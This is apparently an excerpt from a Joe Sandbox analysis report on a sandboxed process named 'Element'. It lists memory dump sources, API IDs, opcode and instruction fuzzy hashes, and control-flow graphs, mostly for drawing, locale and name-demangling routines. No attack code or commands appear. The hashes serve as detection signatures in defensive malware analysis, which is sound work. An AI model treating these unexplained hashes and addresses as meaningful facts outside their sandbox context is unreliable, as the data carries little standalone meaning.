                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                    • Instruction ID: 7726c5af3dc3ead9016802fbfadc93267ede3582e14851095ae26886d1821fce
                    • Opcode Fuzzy Hash: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                    • Instruction Fuzzy Hash: 900140736247818FE7108F20E8593A933A0F75476FF400929E64D86A99CF7DC158CB84
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: 4c9146b6bf86597406d6de9f903d4b6e640457e4a93c8986bcbf77083a3afc0a
                    • Instruction ID: 58c7614d9e48e23bf74ec3e7976cbe0ab5b009671ec3111f3543509caab124dc
                    • Opcode Fuzzy Hash: 4c9146b6bf86597406d6de9f903d4b6e640457e4a93c8986bcbf77083a3afc0a
                    • Instruction Fuzzy Hash: 7B01D635300B80A5F7408B56F4386DAA7A0EBB8FE0F5844269E4913B69CE38C5C3C340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                    • Instruction ID: 5d200f1fd395d9101466a82ac86c7a0f302816554c0f156d1329cf1bb4e9fdb0
                    • Opcode Fuzzy Hash: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                    • Instruction Fuzzy Hash: C0F0A42170868241E7209F25FC4476AA265FF88B91F108230EBDD82BAADF3CD8448B04
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystemValue
                    • String ID:
                    • API String ID: 3029459697-0
                    • Opcode ID: 80b9f8f0eff9f381ffb858e47286a2614544a4ae9f2f5ac581fd68414b33c0fc
                    • Instruction ID: 5ea9772f1c76e1ddd674952a7a47f28c576869edc8ede931a02f92dae8950230
                    • Opcode Fuzzy Hash: 80b9f8f0eff9f381ffb858e47286a2614544a4ae9f2f5ac581fd68414b33c0fc
                    • Instruction Fuzzy Hash: E111E1B3A04644DAFB14AF26D0A47E87BE1F3A4BE1F448115DA26833C4CA74C6D2C750
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystemValue
                    • String ID:
                    • API String ID: 3029459697-0
                    • Opcode ID: 42e42687f5c50c62cb49a7e3ae48be6ccfbac4299658b74d6e3400739adc2ed5
                    • Instruction ID: 7ef3b43531945cd9daebcf968c9cf937757d2073720e493a7c745b9b3d8f0213
                    • Opcode Fuzzy Hash: 42e42687f5c50c62cb49a7e3ae48be6ccfbac4299658b74d6e3400739adc2ed5
                    • Instruction Fuzzy Hash: 010124F270438096F7106F25F4787D976E1E7A0BA1F418222DA31073C8DB7485C2CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: EnumLocalesSystem
                    • String ID:
                    • API String ID: 2099609381-0
                    • Opcode ID: a1cc8749853157851109651033536a3933ca55c2c0cd0e25aac1eff4f86ef32d
                    • Instruction ID: e8a519bb0ce5c1ef4676dd5423eb25d35a0c5d8a385cb37d14ca18ad6fe2411b
                    • Opcode Fuzzy Hash: a1cc8749853157851109651033536a3933ca55c2c0cd0e25aac1eff4f86ef32d
                    • Instruction Fuzzy Hash: 17F019B6200B4092F754EB65F8B42DA33A5F7A97C0F189025EE5993365DE3CC4A2C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 1733e94d0ffd1f5b69c1596078f7f5ded00b0d8dd025816a24b1372a8426e6e5
                    • Instruction ID: b966bb594269fe80ad948587df88320d4c7e6b4ed561a7f29c4710e9bc500e5d
                    • Opcode Fuzzy Hash: 1733e94d0ffd1f5b69c1596078f7f5ded00b0d8dd025816a24b1372a8426e6e5
                    • Instruction Fuzzy Hash: BCD09E31A25A4491EB44DB1AE4A434967A1F7D4B41F809011EA4D43764DE38C496CB00
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e7bf95b57a972494f7e677b83735c9208e384b02d65c48a2ba5b0edec11da3a
                    • Instruction ID: a06f63f5fdb4ac81de6f18cb5ae04ffa16689fd1020ed2cf369b09d9f550921f
                    • Opcode Fuzzy Hash: 6e7bf95b57a972494f7e677b83735c9208e384b02d65c48a2ba5b0edec11da3a
                    • Instruction Fuzzy Hash: B72147F744EAC41BF3934E78997E2DB3F90E771E04F1E8056DA80491C7A52994879641
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e058122a449c3bc0fb019550bab4e213ee000eaae5b05e9141bc20034f926791
                    • Instruction ID: 4ad52bf4383d698ef9f328d6a3ae7c416ecbd6e810b78e3e09859c348c816908
                    • Opcode Fuzzy Hash: e058122a449c3bc0fb019550bab4e213ee000eaae5b05e9141bc20034f926791
                    • Instruction Fuzzy Hash: ED2161BB54EAC45AF3934E785C7E2CB3F90E7B5E00F5E805ACB80461C3A17958879651
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dbc9e2954dff7354c133cdcf5da47f837c267d12aafacb9abd6d582a26f50de4
                    • Instruction ID: 3b11ab3f311c7a7741bf023a3322979605bf8460b4a52033c89771692e075733
                    • Opcode Fuzzy Hash: dbc9e2954dff7354c133cdcf5da47f837c267d12aafacb9abd6d582a26f50de4
                    • Instruction Fuzzy Hash: 5F2153BB44EAC45AF3934E789C7E2CB3FA0E775E00F19805ADB80461C3A13958879652
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2eac61d6d270c60210251688f737f4978352fd6a3a2b20f3312eff1ae6cab5eb
                    • Instruction ID: e3a5df7a0efafb44092dec8a5ff0db56ceb363ae7366a155032eb2240c1c4672
                    • Opcode Fuzzy Hash: 2eac61d6d270c60210251688f737f4978352fd6a3a2b20f3312eff1ae6cab5eb
                    • Instruction Fuzzy Hash: 2E1133BB44EAC41AF3934E789D3F2CB3ED0E775E04B1A805ADB80461D3D17958479652
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                    • Instruction ID: 459d5a8dffd6218b7b61dc64699dca82bafa80113877d461396739e26fda10ff
                    • Opcode Fuzzy Hash: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                    • Instruction Fuzzy Hash: CEF044B16392958AEB94CF2DA8426297790E708791B90817DDAC9C3A44DE3C94618F04
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                    • Instruction ID: 3c2465243e1097111b6f35626b7e31f5ee0f537208d4b210687f972e527fbf73
                    • Opcode Fuzzy Hash: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                    • Instruction Fuzzy Hash: EEA0012191A85AD4E6449F01AC590612260AB50B16B854471E09D950A69F3CA8548344

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1896 21925d3c038-21925d3c06b 1897 21925d3c5f6-21925d3c609 1896->1897 1898 21925d3c071-21925d3c098 1896->1898 1899 21925d3c60c-21925d3c60f call 21925d3a548 1897->1899 1900 21925d3c09e 1898->1900 1901 21925d3c1b3-21925d3c1b6 1898->1901 1908 21925d3c614-21925d3c634 1899->1908 1905 21925d3c1a1-21925d3c1ae 1900->1905 1906 21925d3c0a4-21925d3c0a7 1900->1906 1903 21925d3c1ed-21925d3c1f4 1901->1903 1904 21925d3c1b8-21925d3c1dc call 21925d3d644 1901->1904 1912 21925d3c200-21925d3c207 1903->1912 1913 21925d3c1f6-21925d3c1f9 1903->1913 1922 21925d3c539-21925d3c53d 1904->1922 1925 21925d3c1e2-21925d3c1e8 1904->1925 1907 21925d3c530-21925d3c534 call 21925d3a004 1905->1907 1910 21925d3c11f-21925d3c124 1906->1910 1911 21925d3c0a9 1906->1911 1907->1922 1915 21925d3c18f-21925d3c19c 1910->1915 1916 21925d3c126-21925d3c129 1910->1916 1918 21925d3c0ab-21925d3c0ae 1911->1918 1919 21925d3c0d7-21925d3c0e4 1911->1919 1920 21925d3c20d 1912->1920 1921 21925d3c310-21925d3c313 1912->1921 1913->1912 1915->1907 1923 21925d3c12b-21925d3c12e 1916->1923 1924 21925d3c162-21925d3c18a call 21925d3a5cc 1916->1924 1928 21925d3c10d-21925d3c11a 1918->1928 1929 21925d3c0b0-21925d3c0b3 1918->1929 1919->1907 1930 21925d3c2fe-21925d3c30b 1920->1930 1931 21925d3c213-21925d3c216 1920->1931 1926 21925d3c48f-21925d3c492 1921->1926 1927 21925d3c319 1921->1927 1934 21925d3c56d-21925d3c574 1922->1934 1935 21925d3c53f-21925d3c545 1922->1935 1937 21925d3c130-21925d3c133 1923->1937 1938 21925d3c14c-21925d3c15d call 21925d3a004 1923->1938 1924->1922 1925->1908 1942 21925d3c526 1926->1942 1943 21925d3c498-21925d3c49b 1926->1943 1939 21925d3c47d-21925d3c48a 1927->1939 1940 21925d3c31f-21925d3c322 1927->1940 1928->1907 1929->1928 1941 21925d3c0b5-21925d3c0b8 1929->1941 1930->1907 1932 21925d3c21c 1931->1932 1933 21925d3c2b7-21925d3c2ba 1931->1933 1945 21925d3c2ef-21925d3c2f9 1932->1945 1946 21925d3c222-21925d3c225 1932->1946 1933->1945 1947 21925d3c2bc-21925d3c2bf 1933->1947 1951 21925d3c578-21925d3c5ad call 21925d3a1f0 call 21925d3a548 1934->1951 1948 21925d3c55d-21925d3c56b 1935->1948 1949 21925d3c547-21925d3c54b 1935->1949 1952 21925d3c135-21925d3c138 1937->1952 1953 21925d3c144-21925d3c147 1937->1953 1938->1924 1939->1907 1954 21925d3c37b 1940->1954 1955 21925d3c324-21925d3c327 1940->1955 1941->1928 1956 21925d3c0ba-21925d3c0bd 1941->1956 1957 21925d3c52d 1942->1957 1958 21925d3c49d-21925d3c4a0 1943->1958 1959 21925d3c4d3-21925d3c524 call 21925d3f094 call 21925d3a1f0 call 21925d3a548 1943->1959 1945->1907 1971 21925d3c227-21925d3c22a 1946->1971 1972 21925d3c2a4-21925d3c2b2 call 21925d3a4ac 1946->1972 1960 21925d3c2e0-21925d3c2ea 1947->1960 1961 21925d3c2c1-21925d3c2c4 1947->1961 1948->1951 1962 21925d3c54d-21925d3c555 1949->1962 1963 21925d3c5b0-21925d3c5b4 1949->1963 1951->1963 1952->1953 1975 21925d3c13a-21925d3c13d 1952->1975 1973 21925d3c380-21925d3c399 1953->1973 1954->1973 1965 21925d3c369-21925d3c376 1955->1965 1966 21925d3c329-21925d3c32c 1955->1966 1967 21925d3c0bf-21925d3c0c2 1956->1967 1968 21925d3c0fb-21925d3c108 1956->1968 1957->1907 1969 21925d3c4c7-21925d3c4d1 1958->1969 1970 21925d3c4a2-21925d3c4a5 1958->1970 1959->1922 1960->1907 1961->1960 1976 21925d3c2c6-21925d3c2c9 1961->1976 1962->1963 1977 21925d3c557-21925d3c55b 1962->1977 1979 21925d3c5b6-21925d3c5e2 call 21925d3b7c8 call 21925d3a548 call 21925d3a64c 1963->1979 1980 21925d3c5e7-21925d3c5f4 1963->1980 1965->1907 1981 21925d3c32e-21925d3c331 1966->1981 1982 21925d3c35a-21925d3c364 1966->1982 1967->1968 1983 21925d3c0c4-21925d3c0c7 1967->1983 1968->1907 1969->1907 1984 21925d3c4a7-21925d3c4aa 1970->1984 1985 21925d3c4b8-21925d3c4bb 1970->1985 1986 21925d3c22c-21925d3c22f 1971->1986 1987 21925d3c265-21925d3c29f call 21925d3c038 call 21925d3a1f0 1971->1987 1972->1922 1988 21925d3c3fa-21925d3c3fd 1973->1988 1989 21925d3c39b-21925d3c3be call 21925d3f518 1973->1989 1975->1953 1991 21925d3c13f-21925d3c142 1975->1991 1994 21925d3c2cb-21925d3c2ce 1976->1994 1995 21925d3c2d4-21925d3c2db 1976->1995 1977->1948 1977->1963 1979->1980 1980->1908 1998 21925d3c348-21925d3c355 1981->1998 1999 21925d3c333-21925d3c336 1981->1999 1982->1907 2000 21925d3c0e9-21925d3c0f6 1983->2000 2001 21925d3c0c9-21925d3c0cc 1983->2001 1984->1985 2002 21925d3c4ac-21925d3c4b6 1984->2002 1985->1969 2003 21925d3c231-21925d3c234 1986->2003 2004 21925d3c253-21925d3c260 1986->2004 1987->1899 2008 21925d3c3ff-21925d3c407 1988->2008 2009 21925d3c462-21925d3c478 call 21925d3f518 1988->2009 2027 21925d3c3c0-21925d3c3e8 call 21925d3a5cc 1989->2027 2028 21925d3c3eb-21925d3c3f5 1989->2028 1991->1904 1991->1953 1994->1995 1994->2002 1995->1957 1998->1907 1999->2002 2015 21925d3c33c-21925d3c343 1999->2015 2000->1907 2001->2000 2016 21925d3c0ce-21925d3c0d1 2001->2016 2002->1907 2003->2004 2017 21925d3c236-21925d3c239 2003->2017 2004->1907 2010 21925d3c409-21925d3c41f call 21925d3a004 2008->2010 2011 21925d3c44b-21925d3c44d 2008->2011 2009->1908 2010->2009 2037 21925d3c421-21925d3c449 call 21925d3a5cc 2010->2037 2011->2009 2022 21925d3c44f-21925d3c45d call 21925d3a004 2011->2022 2015->1957 2016->1904 2016->1919 2025 21925d3c23b-21925d3c23e 2017->2025 2026 21925d3c244-21925d3c24e 2017->2026 2022->2009 2025->2002 2025->2026 2026->1907 2027->2028 2028->1908 2037->2009
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                    • API String ID: 2943138195-1482988683
                    • Opcode ID: bf9c44b2e97561f35a32cc1340e6c42fb4d1cfa284a7476b3b5f661ab105efb4
                    • Instruction ID: a0be5232fa5f5e9febb07adeb7817e5814f55776be38e9ad724c82444ac83215
                    • Opcode Fuzzy Hash: bf9c44b2e97561f35a32cc1340e6c42fb4d1cfa284a7476b3b5f661ab105efb4
                    • Instruction Fuzzy Hash: 35026E72B10A10B8FB65DB68D8BC3ED27B0BB25744F504919CE4957AB8EB35C9C6CB40

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3167 7ff6c591f0c0-7ff6c591f0e9 3168 7ff6c591f0eb-7ff6c591f0f0 call 7ff6c591f418 3167->3168 3169 7ff6c591f0f5-7ff6c591f111 3167->3169 3177 7ff6c591f3ff-7ff6c591f416 3168->3177 3171 7ff6c591f118-7ff6c591f121 3169->3171 3172 7ff6c591f113-7ff6c591f116 3169->3172 3175 7ff6c591f130-7ff6c591f145 SetTextColor 3171->3175 3176 7ff6c591f123 3171->3176 3174 7ff6c591f128-7ff6c591f12e GetSysColor 3172->3174 3174->3175 3178 7ff6c591f147-7ff6c591f164 GetSysColorBrush GetSysColor 3175->3178 3179 7ff6c591f166-7ff6c591f173 CreateSolidBrush 3175->3179 3176->3174 3180 7ff6c591f17a-7ff6c591f1a4 SetBkColor SelectObject 3178->3180 3179->3180 3181 7ff6c591f1a6-7ff6c591f1ec InflateRect GetSysColor CreateSolidBrush FrameRect DeleteObject 3180->3181 3182 7ff6c591f1ee-7ff6c591f1f1 3180->3182 3183 7ff6c591f21d-7ff6c591f22d 3181->3183 3184 7ff6c591f206-7ff6c591f217 DrawFrameControl 3182->3184 3185 7ff6c591f1f3-7ff6c591f200 InflateRect 3182->3185 3186 7ff6c591f23f-7ff6c591f247 3183->3186 3187 7ff6c591f22f-7ff6c591f23d InflateRect 3183->3187 3184->3183 3185->3184 3189 7ff6c591f249 3186->3189 3190 7ff6c591f24e-7ff6c591f25a InflateRect 3186->3190 3188 7ff6c591f25d-7ff6c591f26f FillRect 3187->3188 3191 7ff6c591f276-7ff6c591f27a 3188->3191 3192 7ff6c591f271-7ff6c591f274 3188->3192 3189->3190 3190->3188 3193 7ff6c591f27e-7ff6c591f2b6 GetWindowLongW 3191->3193 3192->3191 3192->3193 3194 7ff6c591f2b8-7ff6c591f2bb 3193->3194 3195 7ff6c591f2bd-7ff6c591f2c1 3193->3195 3196 7ff6c591f2c6-7ff6c591f32f SendMessageW call 7ff6c5894aa8 GetWindowTextW DrawTextW 3194->3196 3195->3196 3197 7ff6c591f2c3 3195->3197 3200 7ff6c591f371-7ff6c591f374 3196->3200 3201 7ff6c591f331-7ff6c591f36b GetSysColor SetTextColor DrawTextW 3196->3201 3197->3196 3202 7ff6c591f376-7ff6c591f3bd CreateSolidBrush FrameRect DeleteObject InflateRect DrawFocusRect 3200->3202 3203 7ff6c591f3c3-7ff6c591f3fa call 7ff6c5894a64 SelectObject DeleteObject SetTextColor SetBkColor 3200->3203 3201->3200 3202->3203 3203->3177
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    • String ID:
                    • API String ID: 3521893082-0
                    • Opcode ID: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                    • Instruction ID: 3ef88be5f94f628e168b46d71480984f66060d1782b04d2e7c8cff494b70ab62
                    • Opcode Fuzzy Hash: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                    • Instruction Fuzzy Hash: D1A1A026F08A9286EB148F61DD4957D27A1BB48F76F104630DEAA8AB96DF3C98448740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                    • Instruction ID: f04f8451161760265ab5175b457b943a95f9fa455b2c63c7ac15dcc8b5ffcf89
                    • Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                    • Instruction Fuzzy Hash: 29717236A08A9586E7149F11ED4867A73A1FB89FB2F004274DD9E87BD6DF3CD8458B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Color$LongWindow$ModeObjectStockText
                    • String ID:
                    • API String ID: 554392163-0
                    • Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                    • Instruction ID: 9156be251e9b9dc3c04b1d4a7e03144cea257e07c174c95d5207a6918574304d
                    • Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                    • Instruction Fuzzy Hash: 1A81D721E0D6A381EA709F299C4867D2395EF45FA2F550231D9DF876E5DF3CAC428740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+$Replicator::operator[]
                    • String ID: `anonymous namespace'
                    • API String ID: 3863519203-3062148218
                    • Opcode ID: ecac5bda029f4e8b39351dcf81bee64cf9ec5b6670d11ee5966aacbfeb8e7bc0
                    • Instruction ID: d41aadf69cfeef5affcba74928f565375a78a0fd9d9e3984e64c587116e42559
                    • Opcode Fuzzy Hash: ecac5bda029f4e8b39351dcf81bee64cf9ec5b6670d11ee5966aacbfeb8e7bc0
                    • Instruction Fuzzy Hash: F2E1AC72604B86B9FB10DF24E8B82DD77A0F364784F948116DF8957B65DB38C696CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 2091158083-3440237614
                    • Opcode ID: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                    • Instruction ID: 6818ea1d5d3ccaf2012eef2b0a4b0f2f80f1bc4ba767d3ecbd24c1152b8e4048
